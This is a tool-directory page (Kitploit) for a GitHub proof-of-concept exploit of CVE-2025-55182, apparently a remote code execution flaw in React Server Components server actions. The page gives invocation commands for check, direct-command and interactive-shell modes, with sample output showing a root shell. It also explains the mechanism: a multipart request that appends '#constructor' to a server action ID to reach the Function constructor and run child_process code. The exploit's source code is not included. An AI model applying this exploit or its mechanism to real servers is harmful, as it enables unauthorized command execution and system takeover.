Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/emiyelbarto/cve-2025-55182-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubemiyelbarto/cve-2025-55182-poc

CVE-2025-55182-PoC

Poc for CVE-2025-55182

View Repository
19 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-55182-PoC

Poc for CVE-2025-55182

root@kitploit:~
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"

Legal Disclaimer

This tool is provided for educational purposes and authorized security testing only. Usage of this tool for attacking targets without prior mutual consent is illegal. The developer assumes no liability and is not responsible for any misuse or damage caused by this program.

Requirements

pip install requests

Usage

You can run the tool in three modes: Check, Exploit, or Interactive Shell.

root@kitploit:~
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]

options:
  -h, --help         show this help message and exit
  -u URL             Target URL (e.g., http://localhost:3000)
  --id ID            Target Server Action ID (default: user-profile-action)
  -c CMD, --cmd CMD  Command to execute directly (non-interactive mode)
  --check            Only check for vulnerability (Crash Method), do not exploit

Example

root@kitploit:~
python3 poc.py -u http://target-site.com --check
Download Tool

Single command execution

root@kitploit:~
python3 poc.py -u http://target-site.com --cmd "id"

Interactive Shell Mode

root@kitploit:~
python3 poc.py

# Inside the shell
RSC-Shell> set url http://localhost:3000
[+] URL set to: http://localhost:3000
RSC-Shell> check
[+] TARGET IS VULNERABLE!
RSC-Shell> shell
[*] Starting pseudo-interactive shell. Use 'exit' to return.
cmd> whoami
root

How it works

The Check: Sends a multipart request defining {} at index 1, and attempting to access ["$1🅰️a"]. Unpatched servers crash (HTTP 500) trying to access property a of undefined. Patched servers return HTTP 200.

The Exploit: Sends a multipart request referencing the valid Action ID, but appends #constructor. This tricks the serializer into returning the Function constructor, allowing us to pass arbitrary JavaScript (Node.js child_process) to be executed on the server.